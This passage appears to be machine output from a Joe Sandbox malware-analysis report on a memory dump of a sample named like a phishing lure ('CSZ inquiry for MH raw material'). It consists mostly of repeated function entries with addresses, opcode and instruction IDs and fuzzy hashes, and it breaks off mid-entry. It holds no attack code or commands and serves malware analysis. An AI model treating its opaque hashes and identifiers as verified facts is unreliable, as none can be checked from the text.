                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction Fuzzy Hash: 00C04879B01A428FDF56DB6AD2A4F49B7E4FB84790F150890E845CFB22E624E901CA10
                                                Function 01544340 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                • Instruction ID: cd2810c3ae8062881371a5182ae5672492cf55826e4ceddf3bf37c694559583a
                                                • Opcode Fuzzy Hash: b437deeb90b7eff2a49a9d95750fc022bda96382db6c971eb82c613f6eb5355f
                                                • Instruction Fuzzy Hash: 6A900231605800129280715988945464045B7E0311B59C412F4424954CCA548A565761
                                                Function 01544650 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                • Instruction ID: f37de82b517438baf1f5cd146ca2cd8cb2a901f990cb3ba6fcccdafd2cd628c8
                                                • Opcode Fuzzy Hash: fa9699895cae5e3ebbdaa42c8a7923ee052af60a080fb5bb4469d72c1555b7f4
                                                • Instruction Fuzzy Hash: D1900261601500424280715988144066045B7E1311399C516B4554960CC65889559769
                                                Function 01542BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                • Instruction ID: 0938a968eefb6af81e0f002140e769cb0279ea4644d7775395fd66992ddced36
                                                • Opcode Fuzzy Hash: d743f08009619bd19744aed582edb2524dd008909b27d379643e40ed638045f7
                                                • Instruction Fuzzy Hash: 7A90023120140802D2C07159841464A0045A7D1311F99C416B4025A54DCA558B597BA1
                                                Function 01542BE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                • Instruction ID: c73e9a5d87c6d9f3860d6dc39b3515a4d1af4758600431f1203fb82266d3829c
                                                • Opcode Fuzzy Hash: 4b8f850e3897b600856afdcaa7c3ba4a8f0260f5af12edffd6cb7372bbc90c76
                                                • Instruction Fuzzy Hash: BA90023120544842D28071598414A460055A7D0315F59C412B4064A94DD6658E55BB61
                                                Function 01542B80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                • Instruction ID: 298b3e5df36c5517d2ef66907452ecb71eeeec3cb27b360a7e35995b3f54f77b
                                                • Opcode Fuzzy Hash: fef496b53598d154f32b6125d155c89dcbf3774c45bca005894a7919d6f79ddf
                                                • Instruction Fuzzy Hash: E390023120140802D244715988146860045A7D0311F59C412BA024A55ED6A589917631
                                                Function 01542BA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                • Instruction ID: 8b6b4252511524c0c996783177199e401334055d7c86dbc0c17649f43074399f
                                                • Opcode Fuzzy Hash: 882ed77e62cff1bb06fb5d72e192722447f6db873fcb81011371fb690e91d1b9
                                                • Instruction Fuzzy Hash: 8E90023160540802D290715984247460045A7D0311F59C412B4024A54DC7958B557BA1
                                                Function 01542AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                • Instruction ID: 214febbc71f1f339fbcb0d4245c7f172611659158d17247f191078edcd20053f
                                                • Opcode Fuzzy Hash: 46da559da64f04210ff63fb1b65be8f089c44f9b10ede0a086952cd92f4abc5d
                                                • Instruction Fuzzy Hash: BF900225211400030245B55947145070086A7D5361359C422F5015950CD66189615621
                                                Function 01542AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                • Instruction ID: f77e9253932dc39f8c83ad507a0500bf4286f8a34b87f5b02a86a953f58574f1
                                                • Opcode Fuzzy Hash: 999838836efa49ac1d32ac72ea6624b87642d745dde03eb3f153beedd90c581c
                                                • Instruction Fuzzy Hash: 62900225221400020285B559461450B0485B7D6361399C416F5416990CC66189655721
                                                Function 01542AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                • Instruction ID: 73886268a93384123654ba84723b62d6149f568040db39f719c2bd4c3399fc85
                                                • Opcode Fuzzy Hash: 9adcecad03332ed1a7f1c74533c82f8a57d30e3df31675055fb078e4cf76339a
                                                • Instruction Fuzzy Hash: A19002A1201540924640B259C414B0A4545A7E0211B59C417F5054960CC56589519635
                                                Function 01542D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d09686f06ac8bd886c66cd2aa835ccdc6997edcaad41d35b73eae4a0df1b9707
                                                • Instruction ID: 77283983e8adf80243d304dc9aaea7f0b089048d6131e1e8edcbfbd5d63bb71e
                                                • Opcode Fuzzy Hash: d09686f06ac8bd886c66cd2aa835ccdc6997edcaad41d35b73eae4a0df1b9707
                                                • Instruction Fuzzy Hash: 5B90022921340002D2C07159941860A0045A7D1212F99D816B4015958CC95589695721
                                                Function 01542D00 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e7e0041da0e0baba465cab7cce9df9b76b53c4c4fdb6f0a3aa4e7a205a49882
                                                • Instruction ID: 80414542f3a60442ad63fe92b1942e27aab3895744b7bcf00872f460709ce801
                                                • Opcode Fuzzy Hash: 5e7e0041da0e0baba465cab7cce9df9b76b53c4c4fdb6f0a3aa4e7a205a49882
                                                • Instruction Fuzzy Hash: 5490022120544442D24075599418A060045A7D0215F59D412B5064995DC6758951A631
                                                Function 01542D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 985c89aaf813e0363916cd9f438d79f44077e5a11e5eaea0c10e65e55ca66ec0
                                                • Instruction ID: b9e1b903de34bbc1754d26dc6148e3c8e338ae57dde023953e2d7a0a12317363
                                                • Opcode Fuzzy Hash: 985c89aaf813e0363916cd9f438d79f44077e5a11e5eaea0c10e65e55ca66ec0
                                                • Instruction Fuzzy Hash: C990022130140003D280715994286064045F7E1311F59D412F4414954CD95589565722
                                                Function 01542DD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                • Instruction ID: 63a377e5d0ba343eb1f21d599b43054ac3f73c1a9cc456334926b02499712354
                                                • Opcode Fuzzy Hash: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                • Instruction Fuzzy Hash: 12900221242441525685B15984145074046B7E0251799C413B5414D50CC5669956DB21
                                                Function 01542DB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                • Instruction ID: dd937aad6266b58cf8435d7a264c952caa2e3b020e9cd723cfb9f41aa0bc32bf
                                                • Opcode Fuzzy Hash: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                • Instruction Fuzzy Hash: 5790023124140402D281715984146060049B7D0251F99C413B4424954EC6958B56AF61
                                                Function 01542C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                • Instruction ID: 919ebbc65f0c16aedb9814192e0dddaddfbbf4912b08046c50245481cdb0833f
                                                • Opcode Fuzzy Hash: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                • Instruction Fuzzy Hash: E690023120140842D24071598414B460045A7E0311F59C417B4124A54DC655C9517A21
                                                Function 01542CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                • Instruction ID: ce7d70abeea654d6ac7186911146e72d0c04c52e7271196ca678807343f527fc
                                                • Opcode Fuzzy Hash: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                • Instruction Fuzzy Hash: 1290022160540402D280715994287060055A7D0211F59D412B4024954DC6998B556BA1
                                                Function 01542CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                • Instruction ID: 8d669efc6af242dc3df7cf13f027945232ae23ae3ed0b98e2ba83e1563eb69df
                                                • Opcode Fuzzy Hash: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                • Instruction Fuzzy Hash: D590023120140403D240715995187070045A7D0211F59D812B4424958DD69689516621
                                                Function 01542CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                • Instruction ID: f58125ca386e485354ccdaaa220ca784b782cad3e7f1a289a83331bc151f68af
                                                • Opcode Fuzzy Hash: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                • Instruction Fuzzy Hash: 6490023120140402D240759994186460045A7E0311F59D412B9024955EC6A589916631
                                                Function 01542F60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                • Instruction ID: ba7faff84e40506d279cdb833f4f7b8e6005dab9bb8a5fafb964f83cf55640a9
                                                • Opcode Fuzzy Hash: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                • Instruction Fuzzy Hash: F890026121140042D244715984147060085A7E1211F59C413B6154954CC5698D615625
                                                Function 01542F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                • Instruction ID: ed06092828626b855d748ec973d658a309cf0467646cecd3286e5853fb152c56
                                                • Opcode Fuzzy Hash: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                • Instruction Fuzzy Hash: 9E90026134140442D24071598424B060045E7E1311F59C416F5064954DC659CD526626
                                                Function 01542FE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                • Instruction ID: bf2bec37b182b82ee06dc3a952cacdc32a78e37d4a2898afef90e9337a893826
                                                • Opcode Fuzzy Hash: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                • Instruction Fuzzy Hash: B3900221211C0042D34075698C24B070045A7D0313F59C516B4154954CC95589615A21
                                                Function 01542F90 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                • Instruction ID: 1c69e19fd469b541a75eb209ed163694cba4bd045887f75d0a723a1decb01ae7
                                                • Opcode Fuzzy Hash: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                • Instruction Fuzzy Hash: 4C90023120180402D2407159882470B0045A7D0312F59C412B5164955DC66589516A71
                                                Function 01542FB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                • Instruction ID: d04b86c0d2b8e2af63cd59c820b7a5f56df41cecc90d2e7f75a5a0c1b23ad23c
                                                • Opcode Fuzzy Hash: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                • Instruction Fuzzy Hash: 749002216014004242807169C8549064045BBE1221759C522B4998950DC59989655B65
                                                Function 01542FA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                • Instruction ID: 855e1e50a1f4fb666bb540d78617ea921f11570a3c6030eb1551fec613e06e4c
                                                • Opcode Fuzzy Hash: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                • Instruction Fuzzy Hash: D790023120180402D240715988187470045A7D0312F59C412B9164955EC6A5C9916A31
                                                Function 01542E30 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                • Instruction ID: d245ae64ce447a13370ba8ce5e36038afdbd7d79570106d73d5e420d1288fb90
                                                • Opcode Fuzzy Hash: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                • Instruction Fuzzy Hash: FD90022130140402D242715984246060049E7D1355F99C413F5424955DC6658A53A632
                                                Function 01542EE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                • Instruction ID: 782cf997cfb575823c96aed82f614ee3ec493baa8608a823b38f3a03f49ef07c
                                                • Opcode Fuzzy Hash: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                • Instruction Fuzzy Hash: 2790026120180403D280755988146070045A7D0312F59C412B6064955ECA698D516635
                                                Function 01542E80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                • Instruction ID: 644cc72a4db8c0bc4782a9d3603a08ac52591642dac16e3c84b7f6fba96ebebe
                                                • Opcode Fuzzy Hash: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                • Instruction Fuzzy Hash: CC90022160140502D24171598414616004AA7D0251F99C423B5024955ECA658A92A631
                                                Function 01542EA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                • Instruction ID: 32dfada8a84ecb8fcf51d27cc09faabba8dd2820fdf1d37fccdb7dfaba89cb0e
                                                • Opcode Fuzzy Hash: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                • Instruction Fuzzy Hash: 5C90027120140402D280715984147460045A7D0311F59C412B9064954EC6998ED56B65
                                                Function 01543010 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                • Instruction ID: cdb9297c07720d45645f23e0954916ef3b80734592b2a1d57d23fc168e1dc57d
                                                • Opcode Fuzzy Hash: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                • Instruction Fuzzy Hash: 3F90022120184442D28072598814B0F4145A7E1212F99C41AB8156954CC95589555B21
                                                Function 01543090 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                • Instruction ID: 4842190ef1ce1958fc9ccc3e3d2b66fef9f85b1e9e803dd35ebb83435d3e36c9
                                                • Opcode Fuzzy Hash: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                • Instruction Fuzzy Hash: F490022124140802D2807159C4247070046E7D0611F59C412B4024954DC6568A656BB1
                                                Function 015439B0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                • Instruction ID: 44e4a5e487736c5a5d08b8420fa84c7ecd97ad5e631764169bca2287f007b4f6
                                                • Opcode Fuzzy Hash: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                • Instruction Fuzzy Hash: BE90022124545102D290715D84146164045B7E0211F59C422B4814994DC59589556721
                                                Function 01542C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 98f3ab0e92296d0633ccfe9e15438807cfcb48d3e4f35ee388e0ad3d9ede1832
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 01542890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                • Instruction ID: 4dcd75a0114a9e363e98229f58de91b5e4940aee305de7cc455471a05d5895b9
